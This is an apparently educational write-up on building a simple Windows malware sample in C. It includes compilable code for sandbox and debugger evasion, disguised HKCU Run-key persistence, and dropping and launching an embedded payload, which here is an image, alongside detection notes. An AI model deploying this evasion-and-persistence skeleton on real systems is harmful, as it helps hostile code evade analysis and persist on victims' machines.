Coding a Malware in C
About
This is a simple piece of malware written in C, written to build a concrete understanding of what malware does at its core: calling Windows APIs, applying evasive checks, and editing the registry for persistence. Although this sample is not harmful in itself (its payload is an image), it uses the same conceptual techniques that real malware uses, at a much lower level of complexity.
Malware Coding and Explanation
Core Functions and Techniques
Evasive Techniques
Uptime check, via GetTickCount [1]. The call returns the number of milliseconds since the system booted, which is a cheap sandbox indicator: analysis VMs are typically restored from a snapshot or booted moments before the sample is run. Here anything under 10 minutes (600000 ms) is treated as suspicious and the check returns 1. Two caveats: a real user's machine trips this check too right after boot (which is exactly what happened in the test run below), and GetTickCount is a 32-bit counter that wraps after about 49.7 days; GetTickCount64 avoids the wrap.
if(GetTickCount() < 600000) return 1;
The program also calls IsDebuggerPresent [2], which reads the BeingDebugged flag in the process's PEB and reports whether a user-mode debugger is attached; if one is, the check returns 1. This is the weakest of the checks, since debuggers and anti-anti-debugging plugins routinely clear that flag.
if(IsDebuggerPresent()) return 1;
It also checks whether execution is being slowed down. It reads GetTickCount, pauses the current thread with Sleep(10), reads GetTickCount again and compares the two values. A large gap means the thread was stalled between the two reads, for example by single-stepping, a breakpoint, or heavy instrumentation, so anything over 40 ms is flagged and the check returns 1. Normally the delta is on the order of 10-20 ms; GetTickCount itself only updates every 10-16 ms, so the reading is coarse, which is why the threshold sits well above the sleep length. The subtraction should be done on unsigned values so that a counter wrap between the two reads does not produce a bogus result.
t1 = GetTickCount();
Sleep(10);
t2 = GetTickCount();
if(t2 - t1 > 40) return 1;
Finally, CreateToolhelp32Snapshot [3] with TH32CS_SNAPPROCESS takes a snapshot of every running process. The program walks the snapshot with Process32First/Process32Next and compares each entry's szExeFile against a list of analysis-tool names (anything containing "dbg", such as x64dbg or WinDbg, plus other suspicious processes); a hit returns 1. The snapshot is a point-in-time copy, so a tool started after the check runs is not seen.
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
Process32First() / Process32Next()
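The four checks above, gathered into one program as an added example (this is not the page's own code). The decision logic is kept in plain functions that take the measured values as arguments, so it compiles and can be exercised on any platform; the Windows API calls that feed them sit under `#ifdef _WIN32`. The blocklist of process names is an assumption, since the page only says "dbg or other suspicious processes", and the constructed process list in the non-Windows `main` stands in for the Toolhelp snapshot. Compile without UNICODE defined so that `szExeFile` is a `char` array.

```c
/* Added example, not the page's code: the anti-analysis checks described
 * above, with the decision logic separated from the Windows calls.
 * The process-name blocklist below is an assumption. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#include <tlhelp32.h>
#endif

#define MIN_UPTIME_MS     600000u   /* 10 minutes */
#define SLEEP_MS          10u
#define MAX_SLEEP_DELTA   40u

/* Uptime check. GetTickCount is a 32-bit millisecond counter that wraps
 * every ~49.7 days, so a long-running host can read as "just booted";
 * GetTickCount64 avoids that. */
static int uptime_is_suspicious(uint32_t tick_ms) {
    return tick_ms < MIN_UPTIME_MS;
}

/* Timing check around Sleep(10). Unsigned subtraction gives the right delta
 * even if the counter wrapped between the two reads. A delta well above the
 * 10-16 ms tick resolution means the thread was stalled (single-stepping,
 * breakpoint, heavy instrumentation). Sleep-skipping sandboxes produce the
 * opposite symptom, an implausibly small delta, which this check ignores. */
static int sleep_delta_is_suspicious(uint32_t t1, uint32_t t2) {
    uint32_t delta = t2 - t1;
    return delta > MAX_SLEEP_DELTA;
}

/* Assumed blocklist: "dbg" covers x64dbg/x32dbg/WinDbg/OllyDbg. Longer
 * names are used where a short substring would hit benign processes
 * ("ida" alone would match nvidia*). */
static const char *const kSuspicious[] = {
    "dbg", "ida.exe", "ida64.exe", "procmon", "procexp", "wireshark", NULL
};

/* Case-insensitive substring search (Windows image names vary in case). */
static int contains_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n) return 1;
    }
    return 0;
}

static int process_name_is_suspicious(const char *exe_name) {
    for (size_t i = 0; kSuspicious[i]; i++)
        if (contains_ci(exe_name, kSuspicious[i])) return 1;
    return 0;
}

/* Run the filter over a NULL-terminated list of image names. Returns the
 * index of the first hit, or -1. */
static int first_suspicious(const char *const *names) {
    for (int i = 0; names[i]; i++)
        if (process_name_is_suspicious(names[i])) return i;
    return -1;
}

#ifdef _WIN32
static int analysis_tool_running(void) {
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return 0;
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof pe;               /* required before Process32First */
    int hit = 0;
    if (Process32First(snap, &pe)) {
        do {
            if (process_name_is_suspicious(pe.szExeFile)) { hit = 1; break; }
        } while (Process32Next(snap, &pe));
    }
    CloseHandle(snap);
    return hit;
}

/* The page's four checks in order; 1 means "do nothing, we are being watched". */
int being_analysed(void) {
    if (uptime_is_suspicious(GetTickCount())) return 1;
    if (IsDebuggerPresent()) return 1;          /* reads PEB->BeingDebugged */
    DWORD t1 = GetTickCount();
    Sleep(SLEEP_MS);
    DWORD t2 = GetTickCount();
    if (sleep_delta_is_suspicious(t1, t2)) return 1;
    return analysis_tool_running();
}
#endif

int main(void) {
#ifdef _WIN32
    printf("analysis environment: %s\n", being_analysed() ? "yes" : "no");
#else
    /* Constructed process list standing in for the Toolhelp snapshot. */
    const char *const sample[] = { "explorer.exe", "svchost.exe", "x64dbg.exe", NULL };
    printf("first suspicious index: %d\n", first_suspicious(sample));   /* 2 */
#endif
    return 0;
}
```

Keeping the thresholds and the blocklist in one place makes it obvious how brittle these heuristics are: a sandbox that fakes uptime, patches `IsDebuggerPresent`, or renames its tools passes all four checks.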
Persistence and Sustainability
A very common technique, MITRE ATT&CK T1547.001 (Registry Run Keys / Startup Folder): the sample writes a value under the current user's Run key so that it is launched at every logon of that user, which on a single-user machine means every boot. Because the key lives under HKEY_CURRENT_USER, writing it only needs write access to the user's own hive (KEY_SET_VALUE), not administrator privileges, which is why HKCU\Run is far more common in commodity malware than HKLM\Run. The value is named "Updater" so it looks like a harmless update component in an autoruns listing.
RegOpenKeyExA(HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", ...)
RegSetValueExA(hk, "Updater", 0, REG_SZ, ...)
Embedded Payload Execution
The image payload is stored inside the executable itself. At run time the sample resolves the user's temp directory with GetTempPathA, writes the embedded bytes out to a file there with CreateFileA/WriteFile, and hands that file to ShellExecuteA with the "open" verb, which launches whatever application is registered for the file type (the default image viewer). Because the Run value points at the dropper, the same drop-and-open sequence repeats on every boot.
GetTempPathA(MAX_PATH, tmp);
CreateFileA() / WriteFile()
ShellExecuteA(NULL, "open", path, ...)
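The persistence and payload-drop steps above, combined into one program as an added example (not the page's own code). The payload bytes are a constructed placeholder for the embedded image, the value name "Updater" and file name "cat.jpg" are taken from the page, and the helper names (`build_run_value`, `drop_payload`, `persist_hkcu_run`) are mine. The portable pieces compile anywhere, so the one detail that is easy to get wrong is visible and checkable: REG_SZ data passed to RegSetValueExA must include the terminating NUL in its byte count, and a path with spaces should be quoted. The registry and ShellExecute calls are Windows-only and guarded.

```c
/* Added example, not the page's code: drop an embedded payload to the temp
 * directory and register the running executable under HKCU\...\Run.
 * kPayload is a constructed placeholder; helper names are mine. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#include <shellapi.h>
#endif

/* Stand-in for the embedded image; the drop logic does not care what the
 * bytes are. (sizeof - 1 drops the string literal's NUL.) */
static const unsigned char kPayload[] = "PLACEHOLDER-PAYLOAD-BYTES";

/* Build the REG_SZ data for a Run value: quote the path so a space in it
 * cannot be misparsed, and return the byte count RegSetValueExA expects,
 * which for REG_SZ includes the terminating NUL. Returns 0 if out is too small. */
static size_t build_run_value(const char *exe_path, char *out, size_t cap) {
    int n = snprintf(out, cap, "\"%s\"", exe_path);
    if (n < 0 || (size_t)n >= cap) return 0;
    return (size_t)n + 1;
}

/* Join dir and name, tolerating a dir with or without a trailing separator
 * (GetTempPathA returns one with a trailing backslash). */
static int join_path(const char *dir, const char *name, char *out, size_t cap) {
    size_t len = strlen(dir);
    int has_sep = len > 0 && (dir[len - 1] == '/' || dir[len - 1] == '\\');
#ifdef _WIN32
    const char *sep = "\\";
#else
    const char *sep = "/";
#endif
    int n = snprintf(out, cap, "%s%s%s", dir, has_sep ? "" : sep, name);
    return (n > 0 && (size_t)n < cap) ? 0 : -1;
}

/* Write blob to dir/name; returns bytes written or -1. Stdio stands in for
 * the page's CreateFileA/WriteFile so this part runs on any platform. */
static long drop_payload(const char *dir, const char *name,
                         const unsigned char *blob, size_t len,
                         char *out_path, size_t cap) {
    if (join_path(dir, name, out_path, cap) != 0) return -1;
    FILE *f = fopen(out_path, "wb");
    if (!f) return -1;
    size_t w = fwrite(blob, 1, len, f);
    if (fclose(f) != 0) return -1;
    return (long)w;
}

#ifdef _WIN32
/* T1547.001: HKCU\...\Run is writable by the interactive user, no admin needed. */
static int persist_hkcu_run(const char *value_name, const char *exe_path) {
    char data[MAX_PATH + 2];
    size_t cb = build_run_value(exe_path, data, sizeof data);
    if (cb == 0) return -1;
    HKEY hk;
    if (RegOpenKeyExA(HKEY_CURRENT_USER,
                      "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                      0, KEY_SET_VALUE, &hk) != ERROR_SUCCESS) return -1;
    LONG rc = RegSetValueExA(hk, value_name, 0, REG_SZ,
                             (const BYTE *)data, (DWORD)cb);
    RegCloseKey(hk);
    return rc == ERROR_SUCCESS ? 0 : -1;
}

/* "open" hands the file to the handler registered for its type. */
static int open_with_default_handler(const char *path) {
    HINSTANCE h = ShellExecuteA(NULL, "open", path, NULL, NULL, SW_SHOWNORMAL);
    return (INT_PTR)h > 32 ? 0 : -1;   /* values <= 32 are error codes */
}
#endif

int main(void) {
    char dir[260], path[300];
#ifdef _WIN32
    if (GetTempPathA(sizeof dir, dir) == 0) return 1;
    char self[MAX_PATH];
    if (GetModuleFileNameA(NULL, self, MAX_PATH) == 0) return 1;
    if (persist_hkcu_run("Updater", self) != 0) return 1;
#else
    const char *t = getenv("TMPDIR");
    snprintf(dir, sizeof dir, "%s", t ? t : "/tmp");
#endif
    long n = drop_payload(dir, "cat.jpg", kPayload, sizeof kPayload - 1, path, sizeof path);
    if (n < 0) return 1;
    printf("dropped %ld bytes to %s\n", n, path);
#ifdef _WIN32
    return open_with_default_handler(path) == 0 ? 0 : 1;
#else
    return 0;
#endif
}
```

From the defender's side, the same two artifacts are the detection: a new value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing at an executable, and a file written to %TEMP% by that executable and opened via ShellExecute shortly afterwards.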
Executing the Malware!
Running the sample in the isolated VM immediately after boot, it took no action: the uptime check tripped (less than ten minutes since boot) and the sample treated the host as a sandbox. After waiting past the ten-minute mark and running it again, the cat image popped up, the "Updater" value was written to the registry, and the image now pops up every time the machine boots.

Conclusion
This sample implements techniques that real Windows threats use: sandbox and debugger evasion, detection of analysis tools by process enumeration, registry persistence, and execution of an embedded payload. The control flow is deliberate: the anti-analysis checks gate everything else, persistence is established early, and the payload is dropped and executed without any user interaction. Although simple, it behaves like commodity malware in outline: it stays dormant in monitored environments, survives reboots through HKCU\Run, and runs a secondary payload from disk. These patterns match what is seen in real malware families, minus the encryption, obfuscation, and network communication.
[1] GetTickCount retrieves the number of milliseconds since boot. Used by malware for anti-debugging (timing and uptime checks). Library: Kernel32.dll. Associated attack: anti-debugging. Documentation: https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-gettickcount
[2] IsDebuggerPresent determines whether the calling process is being debugged by a user-mode debugger. Library: Kernel32.dll. Associated attack: anti-debugging. Documentation: https://docs.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent
[3] CreateToolhelp32Snapshot enumerates processes, threads, and modules. Commonly used by malware to enumerate processes before process injection, and here to look for analysis tools. Library: Kernel32.dll. Associated attack: anti-debugging. Documentation: https://docs.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot